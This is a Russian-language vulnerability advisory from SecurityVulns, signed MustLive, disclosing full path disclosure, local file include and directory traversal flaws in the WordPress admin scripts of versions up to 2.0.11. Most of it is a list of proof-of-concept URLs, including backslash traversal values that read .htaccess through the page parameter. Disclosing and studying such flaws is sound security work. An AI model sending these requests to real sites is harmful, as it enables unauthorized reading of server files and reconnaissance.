SecurityvulnsSECURITYVULNS:DOC:18772Local file include, Directory traversal and Full path disclosure in WordPress
Здравствуйте 3APA3A!
Сообщаю вам о найденной мною Local file include, Directory traversal и Full path disclosure уязвимостях в WordPress. Дыры в файлах index.php, link-manager.php, link-add.php, link-categories.php, link-import.php, theme-editor.php, plugins.php, plugin-editor.php, profile.php, users.php, options-general.php, options-writing.php, options-reading.php, options-discussion.php, options-permalink.php, options-misc.php, import.php, admin.php, bookmarklet.php, cat-js.php, inline-uploading.php, options.php, profile-update.php, sidebar.php, user-edit.php (в параметре page), а также в файлах, admin-footer.php, admin-functions.php, edit-form.php, edit-form-advanced.php, edit-form-comment.php, edit-link-form.php, edit-page-form.php, menu.php, menu-header.php, blogger.php, dotclear.php, greymatter.php, livejournal.php, mt.php, rss.php, textpattern.php.
Full path disclosure:
http://site/wp-admin/index.php?page=
http://site/wp-admin/link-manager.php?page=
http://site/wp-admin/link-add.php?page=
http://site/wp-admin/link-categories.php?page=
http://site/wp-admin/link-import.php?page=
http://site/wp-admin/theme-editor.php?page=
http://site/wp-admin/plugins.php?page=
http://site/wp-admin/plugin-editor.php?page=
http://site/wp-admin/profile.php?page=
http://site/wp-admin/users.php?page=
http://site/wp-admin/options-general.php?page=
http://site/wp-admin/options-writing.php?page=
http://site/wp-admin/options-reading.php?page=
http://site/wp-admin/options-discussion.php?page=
http://site/wp-admin/options-permalink.php?page=
http://site/wp-admin/options-misc.php?page=
http://site/wp-admin/import.php?page=
http://site/wp-admin/admin.php?page=
http://site/wp-admin/admin-footer.php
http://site/wp-admin/admin-functions.php
http://site/wp-admin/edit-form.php
http://site/wp-admin/edit-form-advanced.php
http://site/wp-admin/edit-form-comment.php
http://site/wp-admin/edit-link-form.php
http://site/wp-admin/edit-page-form.php
http://site/wp-admin/menu-header.php
http://site/wp-admin/import/blogger.php
http://site/wp-admin/import/dotclear.php
http://site/wp-admin/import/greymatter.php
http://site/wp-admin/import/livejournal.php
http://site/wp-admin/import/mt.php
http://site/wp-admin/import/rss.php
http://site/wp-admin/import/textpattern.php
http://site/wp-admin/bookmarklet.php?page=
http://site/wp-admin/cat-js.php?page=
http://site/wp-admin/inline-uploading.php?page=
http://site/wp-admin/options.php?page=
http://site/wp-admin/profile-update.php?page=
http://site/wp-admin/sidebar.php?page=
http://site/wp-admin/user-edit.php?page=
Данные скрипты уязвимы к атаке с использованием обратного слеша (что работает только на Windows).
Local file include и Directory traversal:
http://site/wp-admin/index.php?page=\..\..\file.php
http://site/wp-admin/index.php?page=\..\..\.htaccess
http://site/wp-admin/link-manager.php?page=\..\..\.htaccess
http://site/wp-admin/link-add.php?page=\..\..\.htaccess
http://site/wp-admin/link-categories.php?page=\..\..\.htaccess
http://site/wp-admin/link-import.php?page=\..\..\.htaccess
http://site/wp-admin/theme-editor.php?page=\..\..\.htaccess
http://site/wp-admin/plugin-editor.php?page=\..\..\.htaccess
http://site/wp-admin/profile.php?page=\..\..\.htaccess
http://site/wp-admin/users.php?page=\..\..\.htaccess
http://site/wp-admin/options-general.php?page=\..\..\.htaccess
http://site/wp-admin/options-writing.php?page=\..\..\.htaccess
http://site/wp-admin/options-reading.php?page=\..\..\.htaccess
http://site/wp-admin/options-discussion.php?page=\..\..\.htaccess
http://site/wp-admin/options-permalink.php?page=\..\..\.htaccess
http://site/wp-admin/options-misc.php?page=\..\..\.htaccess
http://site/wp-admin/import.php?page=\..\..\.htaccess
http://site/wp-admin/admin.php?page=\..\..\.htaccess
http://site/wp-admin/bookmarklet.php?page=\..\..\.htaccess
http://site/wp-admin/cat-js.php?page=\..\..\.htaccess
http://site/wp-admin/inline-uploading.php?page=\..\..\.htaccess
http://site/wp-admin/options.php?page=\..\..\.htaccess
http://site/wp-admin/profile-update.php?page=\..\..\.htaccess
http://site/wp-admin/sidebar.php?page=\..\..\.htaccess
http://site/wp-admin/user-edit.php?page=\..\..\.htaccess
Уязвимы версии WordPress <= 2.0.11 и потенциально последующие версии (2.1.x, 2.2.x и 2.3.x).
Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/1687/
P.S.
Данные уязвимости в WP вместе с предыдущими (http://websecurity.com.ua/1686/) являются моими новогодними подарками.
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua